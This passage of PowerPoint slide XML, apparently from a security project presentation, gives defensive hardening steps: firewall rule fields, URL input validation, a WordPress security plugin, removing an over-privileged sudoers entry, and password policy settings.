              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination Port</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol of the Traffic </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-482600" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It works because only legitimate users can access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4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Hardening Against url code injection on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p5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43" name="Google Shape;443;p5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lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"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Validate and sanitize url inputs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1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan for escape characters or other special symbols for the application language and operating system, such as comment marks.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a whitelist for a limited set of values for the url.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-508000" lvl="1" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Treat all data as untrusted.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444" name="Google Shape;444;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18097100" y="6613025"/>
            <a:ext cx="5549075" cy="5549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9"/>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450" name="Google Shape;450;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731280" y="5711450"/>
            <a:ext cx="22914900" cy="2369700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implementing Patches</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451" name="Google Shape;451;p5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57" name="Google Shape;457;p6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58" name="Google Shape;458;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2237525"/>
            <a:ext cx="22942800" cy="1844700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install the Sucuri Security plugin made for WordPress</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wordpress.org/plugins/sucuri-scanner/</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="459" name="Google Shape;459;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428325" y="4082225"/>
            <a:ext cx="15520850" cy="1640175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Google Shape;460;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323300" y="5722400"/>
            <a:ext cx="13200492" cy="7496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66" name="Google Shape;466;p6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id="467" name="Google Shape;467;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2694225"/>
            <a:ext cx="11757126" cy="8831025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="468" name="Google Shape;468;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12653175" y="2694225"/>
            <a:ext cx="11757124" cy="8831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Implementing Patches - The Best Way (for WordPress)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p6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id="475" name="Google Shape;475;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3045175"/>
            <a:ext cx="11591974" cy="8548125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="476" name="Google Shape;476;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12818325" y="3045175"/>
            <a:ext cx="11591974" cy="87525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Implementing Patches - The “Other” Way</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p6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83" name="Google Shape;483;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295150" y="2142925"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="358"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="12874">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Editing user permission and configuration files is a good way to patch your system. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12874">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6743">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-412009" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="96653"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9194">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11348">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irstly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11348">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>let’s edit our sudoers file to make sure that only the right accounts have access, such as removing steven who is listed in the sudoers file which we were able to use his privilege to escalate to root access. </a:t>
            </a:r>
            <a:endParaRPr sz="11348">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="11348">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-462809" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11348">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo visudo</a:t>
            </a:r>
            <a:endParaRPr sz="11348">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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="358"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="484" name="Google Shape;484;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7060300" y="4433425"/>
            <a:ext cx="17113226" cy="8357275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="485" name="Google Shape;485;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="295150" y="6562500"/>
            <a:ext cx="6187377" cy="4851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Implementing Patches - The “Other” Way</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p6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92" name="Google Shape;492;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870300" y="2387850"/>
            <a:ext cx="20775900" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now let’s edit our password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> files.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488156" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firstly edit the /etc/login.defs to set up password expiration</a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488156" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now let’s edit the /etc/pam.d/common-password file to set up password parameters.</a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488156" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add minlen=8 (or any #of character length to the line: </a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488156" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
